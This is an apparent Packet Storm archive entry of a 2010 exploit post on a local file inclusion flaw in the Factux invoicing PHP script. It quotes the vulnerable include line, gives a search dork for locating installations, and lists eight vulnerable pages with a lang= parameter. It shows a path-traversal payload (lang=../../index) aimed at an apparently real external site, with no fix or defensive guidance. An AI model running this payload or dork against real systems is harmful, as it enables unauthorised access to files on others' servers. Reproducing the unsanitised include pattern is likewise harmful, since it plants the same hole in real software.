Factux Local File Inclusion

2010-05-07T00:00:00
ID PACKETSTORM:89256
Type packetstorm
Reporter altbta
Modified 2010-05-07T00:00:00

Description

                                        
                                            `  
  
[~]######################################### InformatioN  
#############################################[~]  
[~] Title : Factux LFI Vulnerability  
[~] Author: altbta [l_9[at]hotmail.com]  
[~] download : http://www.toocharger.com/telecharger/scripts/factux/3468.htm  
  
[~]######################################### ExploiT  
#############################################[~]  
[~] dork: "Factux le facturier libre V 1.1.5"  
  
### include_once("include/language/$lang.php");  
  
[~] Vulnerable File :  
  
http://127.0.0.1/Factux/admin_modif.php?lang=  
http://127.0.0.1/Factux/admin?lang=  
http://127.0.0.1/Factux/article_new.php?lang=  
http://127.0.0.1/Factux/article_update.php?lang=  
http://127.0.0.1/Factux/backup.php?lang=  
http://127.0.0.1/Factux/backup_timeout.php?lang=  
http://127.0.0.1/Factux/bon_suite.php?lang=  
http://127.0.0.1/Factux/ca_annee.php?lang=  
  
  
[~] Example :  
  
http://altereo.info/factux/ca_annee.php?lang=../../index  
  
  
[~]#########################################~~{ altbta  
}~~######################################[~]  
  
rxh & sad hacker & ab0-3th4b  
  
  
  
`